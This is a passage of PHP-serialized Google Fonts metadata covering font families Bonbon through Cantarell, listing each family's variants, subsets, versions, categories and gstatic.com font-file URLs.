if\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:192;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Bonbon\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v26\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/bonbon/v26/0FlVVPeVlFec4ee_cDEAbQY5-A.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:193;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Bonheur Royale\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v9\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:84:\"http://fonts.gstatic.com/s/bonheurroyale/v9/c4m51nt_GMTrtX-b9GcG4-YRmYK_c0f1N5Ij.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:194;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Boogaloo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/boogaloo/v19/kmK-Zq45GAvOdnaW6x1F_SrQo_1K.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:195;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Bowlby One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/bowlbyone/v19/taiPGmVuC4y96PFeqp8smo6C_Z0wcK4.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:196;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Bowlby One SC\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:82:\"http://fonts.gstatic.com/s/bowlbyonesc/v19/DtVlJxerQqQm37tzN3wMug9Pzgj8owhNjuE.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:197;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Brawler\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/brawler/v19/xn7gYHE3xXewAscGsgC7S9XdZN8.ttf\";s:3:\"700\";s:74:\"http://fonts.gstatic.com/s/brawler/v19/xn7lYHE3xXewAscGiryUb932eNaPfk8.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:198;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Bree Serif\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/breeserif/v17/4UaHrEJCrhhnVA3DgluAx63j5pN1MwI.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:199;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Brygada 1918\";s:8:\"variants\";a:8:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:6:\"italic\";i:5;s:9:\"500italic\";i:6;s:9:\"600italic\";i:7;s:9:\"700italic\";}s:7:\"subsets\";a:6:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:5:\"latin\";i:4;s:9:\"latin-ext\";i:5;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-08-31\";s:5:\"files\";O:8:\"stdClass\":8:{s:7:\"regular\";s:98:\"http://fonts.gstatic.com/s/brygada1918/v21/pe08MI6eKpdGqlF5LANrM--ACNaeo8mTUIR_y2-f-V8Wu5O3gbo.ttf\";s:3:\"500\";s:98:\"http://fonts.gstatic.com/s/brygada1918/v21/pe08MI6eKpdGqlF5LANrM--ACNaeo8mTUIR_y12f-V8Wu5O3gbo.ttf\";s:3:\"600\";s:98:\"http://fonts.gstatic.com/s/brygada1918/v21/pe08MI6eKpdGqlF5LANrM--ACNaeo8mTUIR_y7GY-V8Wu5O3gbo.ttf\";s:3:\"700\";s:98:\"http://fonts.gstatic.com/s/brygada1918/v21/pe08MI6eKpdGqlF5LANrM--ACNaeo8mTUIR_y4iY-V8Wu5O3gbo.ttf\";s:6:\"italic\";s:101:\"http://fonts.gstatic.com/s/brygada1918/v21/pe06MI6eKpdGqlF5LANrM--qAeRhe6D4yip43qfcERwcv7GykboaLg.ttf\";s:9:\"500italic\";s:101:\"http://fonts.gstatic.com/s/brygada1918/v21/pe06MI6eKpdGqlF5LANrM--qAeRhe6D4yip43qfcIxwcv7GykboaLg.ttf\";s:9:\"600italic\";s:101:\"http://fonts.gstatic.com/s/brygada1918/v21/pe06MI6eKpdGqlF5LANrM--qAeRhe6D4yip43qfczxscv7GykboaLg.ttf\";s:9:\"700italic\";s:101:\"http://fonts.gstatic.com/s/brygada1918/v21/pe06MI6eKpdGqlF5LANrM--qAeRhe6D4yip43qfc9hscv7GykboaLg.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:200;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Bubblegum Sans\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:85:\"http://fonts.gstatic.com/s/bubblegumsans/v16/AYCSpXb_Z9EORv1M5QTjEzMEtdaHzoPPb7R4.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:201;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Bubbler One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/bubblerone/v20/f0Xy0eqj68ppQV9KBLmAouHH26MPePkt.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:202;O:8:\"stdClass\":8:{s:6:\"family\";s:4:\"Buda\";s:8:\"variants\";a:1:{i:0;s:3:\"300\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v25\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:3:\"300\";s:67:\"http://fonts.gstatic.com/s/buda/v25/GFDqWAN8mnyIJSSrG7UBr7pZKA0.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:203;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Buenard\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/buenard/v17/OD5DuM6Cyma8FnnsPzf9qGi9HL4.ttf\";s:3:\"700\";s:74:\"http://fonts.gstatic.com/s/buenard/v17/OD5GuM6Cyma8FnnsB4vSjGCWALepwss.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:204;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Bungee\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v11\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/bungee/v11/N0bU2SZBIuF2PU_ECn50Kd_PmA.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:205;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Bungee Hairline\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:88:\"http://fonts.gstatic.com/s/bungeehairline/v18/snfys0G548t04270a_ljTLUVrv-7YB2dQ5ZPqQ.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:206;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Bungee Inline\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v11\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/bungeeinline/v11/Gg8zN58UcgnlCweMrih332VuDGJ1-FEglsc.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:207;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Bungee Outline\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:85:\"http://fonts.gstatic.com/s/bungeeoutline/v18/_6_mEDvmVP24UvU2MyiGDslL3Qg3YhJqPXxo.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:208;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Bungee Shade\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v11\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/bungeeshade/v11/DtVkJxarWL0t2KdzK3oI_jks7iLSrwFUlw.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:209;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Bungee Spice\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v8\";s:12:\"lastModified\";s:10:\"2022-09-14\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:80:\"http://fonts.gstatic.com/s/bungeespice/v8/nwpTtK2nIhxE0q-IwgSpZBqCzyI-aMPF7Q.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:210;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Butcherman\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:77:\"http://fonts.gstatic.com/s/butcherman/v24/2EbiL-thF0loflXUBOdb1zWzq_5uT84.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:211;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Butterfly Kids\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:85:\"http://fonts.gstatic.com/s/butterflykids/v21/ll8lK2CWTjuqAsXDqlnIbMNs5S4arxFrAX1D.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:212;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Cabin\";s:8:\"variants\";a:8:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:6:\"italic\";i:5;s:9:\"500italic\";i:6;s:9:\"600italic\";i:7;s:9:\"700italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v26\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":8:{s:7:\"regular\";s:100:\"http://fonts.gstatic.com/s/cabin/v26/u-4X0qWljRw-PfU81xCKCpdpbgZJl6XFpfEd7eA9BIxxkV2EL7Gvxm7rE_s.ttf\";s:3:\"500\";s:100:\"http://fonts.gstatic.com/s/cabin/v26/u-4X0qWljRw-PfU81xCKCpdpbgZJl6XFpfEd7eA9BIxxkW-EL7Gvxm7rE_s.ttf\";s:3:\"600\";s:100:\"http://fonts.gstatic.com/s/cabin/v26/u-4X0qWljRw-PfU81xCKCpdpbgZJl6XFpfEd7eA9BIxxkYODL7Gvxm7rE_s.ttf\";s:3:\"700\";s:100:\"http://fonts.gstatic.com/s/cabin/v26/u-4X0qWljRw-PfU81xCKCpdpbgZJl6XFpfEd7eA9BIxxkbqDL7Gvxm7rE_s.ttf\";s:6:\"italic\";s:103:\"http://fonts.gstatic.com/s/cabin/v26/u-4V0qWljRw-Pd815fNqc8T_wAFcX-c37MPiNYlWniJ2hJXHx_KlwkzuA_u1Bg.ttf\";s:9:\"500italic\";s:103:\"http://fonts.gstatic.com/s/cabin/v26/u-4V0qWljRw-Pd815fNqc8T_wAFcX-c37MPiNYlWniJ2hJXH9fKlwkzuA_u1Bg.ttf\";s:9:\"600italic\";s:103:\"http://fonts.gstatic.com/s/cabin/v26/u-4V0qWljRw-Pd815fNqc8T_wAFcX-c37MPiNYlWniJ2hJXHGfWlwkzuA_u1Bg.ttf\";s:9:\"700italic\";s:103:\"http://fonts.gstatic.com/s/cabin/v26/u-4V0qWljRw-Pd815fNqc8T_wAFcX-c37MPiNYlWniJ2hJXHIPWlwkzuA_u1Bg.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:213;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Cabin Condensed\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:88:\"http://fonts.gstatic.com/s/cabincondensed/v19/nwpMtK6mNhBK2err_hqkYhHRqmwaYOjZ5HZl8Q.ttf\";s:3:\"500\";s:92:\"http://fonts.gstatic.com/s/cabincondensed/v19/nwpJtK6mNhBK2err_hqkYhHRqmwilMH97F15-K1oqQ.ttf\";s:3:\"600\";s:92:\"http://fonts.gstatic.com/s/cabincondensed/v19/nwpJtK6mNhBK2err_hqkYhHRqmwiuMb97F15-K1oqQ.ttf\";s:3:\"700\";s:92:\"http://fonts.gstatic.com/s/cabincondensed/v19/nwpJtK6mNhBK2err_hqkYhHRqmwi3Mf97F15-K1oqQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:214;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Cabin Sketch\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/cabinsketch/v19/QGYpz_kZZAGCONcK2A4bGOjMn9JM6fnuKg.ttf\";s:3:\"700\";s:85:\"http://fonts.gstatic.com/s/cabinsketch/v19/QGY2z_kZZAGCONcK2A4bGOj0I_1o4dLyI4CMFw.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:215;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Caesar Dressing\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:88:\"http://fonts.gstatic.com/s/caesardressing/v21/yYLx0hLa3vawqtwdswbotmK4vrR3cbb6LZttyg.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:216;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Cagliostro\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:77:\"http://fonts.gstatic.com/s/cagliostro/v21/ZgNWjP5HM73BV5amnX-TjGXEM4COoE4.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:217;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Cairo\";s:8:\"variants\";a:8:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:6:\"arabic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":8:{s:3:\"200\";s:83:\"http://fonts.gstatic.com/s/cairo/v20/SLXVc1nY6HkvangtZmpcWmhzfH5l2WgsQSaT0J0vRQ.ttf\";s:3:\"300\";s:83:\"http://fonts.gstatic.com/s/cairo/v20/SLXVc1nY6HkvangtZmpcWmhzfH5lB2gsQSaT0J0vRQ.ttf\";s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/cairo/v20/SLXVc1nY6HkvangtZmpcWmhzfH5lWWgsQSaT0J0vRQ.ttf\";s:3:\"500\";s:83:\"http://fonts.gstatic.com/s/cairo/v20/SLXVc1nY6HkvangtZmpcWmhzfH5la2gsQSaT0J0vRQ.ttf\";s:3:\"600\";s:83:\"http://fonts.gstatic.com/s/cairo/v20/SLXVc1nY6HkvangtZmpcWmhzfH5lh28sQSaT0J0vRQ.ttf\";s:3:\"700\";s:83:\"http://fonts.gstatic.com/s/cairo/v20/SLXVc1nY6HkvangtZmpcWmhzfH5lvm8sQSaT0J0vRQ.ttf\";s:3:\"800\";s:83:\"http://fonts.gstatic.com/s/cairo/v20/SLXVc1nY6HkvangtZmpcWmhzfH5l2W8sQSaT0J0vRQ.ttf\";s:3:\"900\";s:83:\"http://fonts.gstatic.com/s/cairo/v20/SLXVc1nY6HkvangtZmpcWmhzfH5l8G8sQSaT0J0vRQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:218;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Cairo Play\";s:8:\"variants\";a:8:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:6:\"arabic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v5\";s:12:\"lastModified\";s:10:\"2022-09-14\";s:5:\"files\";O:8:\"stdClass\":8:{s:3:\"200\";s:110:\"http://fonts.gstatic.com/s/cairoplay/v5/wXKEE3QSpo4vpRz_mz6FP-8iaauCLt_Hjopv3miu5IvcJo49mOo1EnYq9yXa8GvzaA.ttf\";s:3:\"300\";s:110:\"http://fonts.gstatic.com/s/cairoplay/v5/wXKEE3QSpo4vpRz_mz6FP-8iaauCLt_Hjopv3miu5IvcJo49mOo1zHYq9yXa8GvzaA.ttf\";s:7:\"regular\";s:110:\"http://fonts.gstatic.com/s/cairoplay/v5/wXKEE3QSpo4vpRz_mz6FP-8iaauCLt_Hjopv3miu5IvcJo49mOo1knYq9yXa8GvzaA.ttf\";s:3:\"500\";s:110:\"http://fonts.gstatic.com/s/cairoplay/v5/wXKEE3QSpo4vpRz_mz6FP-8iaauCLt_Hjopv3miu5IvcJo49mOo1oHYq9yXa8GvzaA.ttf\";s:3:\"600\";s:110:\"http://fonts.gstatic.com/s/cairoplay/v5/wXKEE3QSpo4vpRz_mz6FP-8iaauCLt_Hjopv3miu5IvcJo49mOo1THEq9yXa8GvzaA.ttf\";s:3:\"700\";s:110:\"http://fonts.gstatic.com/s/cairoplay/v5/wXKEE3QSpo4vpRz_mz6FP-8iaauCLt_Hjopv3miu5IvcJo49mOo1dXEq9yXa8GvzaA.ttf\";s:3:\"800\";s:110:\"http://fonts.gstatic.com/s/cairoplay/v5/wXKEE3QSpo4vpRz_mz6FP-8iaauCLt_Hjopv3miu5IvcJo49mOo1EnEq9yXa8GvzaA.ttf\";s:3:\"900\";s:110:\"http://fonts.gstatic.com/s/cairoplay/v5/wXKEE3QSpo4vpRz_mz6FP-8iaauCLt_Hjopv3miu5IvcJo49mOo1O3Eq9yXa8GvzaA.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:219;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Caladea\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v7\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:69:\"http://fonts.gstatic.com/s/caladea/v7/kJEzBugZ7AAjhybUjR93-9IztOc.ttf\";s:6:\"italic\";s:72:\"http://fonts.gstatic.com/s/caladea/v7/kJExBugZ7AAjhybUvR19__A2pOdvDA.ttf\";s:3:\"700\";s:73:\"http://fonts.gstatic.com/s/caladea/v7/kJE2BugZ7AAjhybUtaNY39oYqO52FZ0.ttf\";s:9:\"700italic\";s:76:\"http://fonts.gstatic.com/s/caladea/v7/kJE0BugZ7AAjhybUvR1FQ98SrMxzBZ2lDA.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:220;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Calistoga\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/calistoga/v10/6NUU8F2OJg6MeR7l4e0vtMYAwdRZfw.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:221;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Calligraffitti\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:86:\"http://fonts.gstatic.com/s/calligraffitti/v19/46k2lbT3XjDVqJw3DCmCFjE0vnFZM5ZBpYN-.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:222;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Cambay\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/cambay/v12/SLXJc1rY6H0_ZDsGbrSIz9JsaA.ttf\";s:6:\"italic\";s:70:\"http://fonts.gstatic.com/s/cambay/v12/SLXLc1rY6H0_ZDs2bL6M7dd8aGZk.ttf\";s:3:\"700\";s:72:\"http://fonts.gstatic.com/s/cambay/v12/SLXKc1rY6H0_ZDs-0pusx_lwYX99kA.ttf\";s:9:\"700italic\";s:74:\"http://fonts.gstatic.com/s/cambay/v12/SLXMc1rY6H0_ZDs2bIYwwvN0Q3ptkDMN.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:223;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Cambo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/cambo/v14/IFSqHeNEk8FJk416ok7xkPm8.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:224;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Candal\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/candal/v15/XoHn2YH6T7-t_8cNAR4Jt9Yxlw.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:225;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Cantarell\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/cantarell/v15/B50NF7ZDq37KMUvlO01Ji6hqHK-CLA.ttf\";s:6:\"italic\";s:77: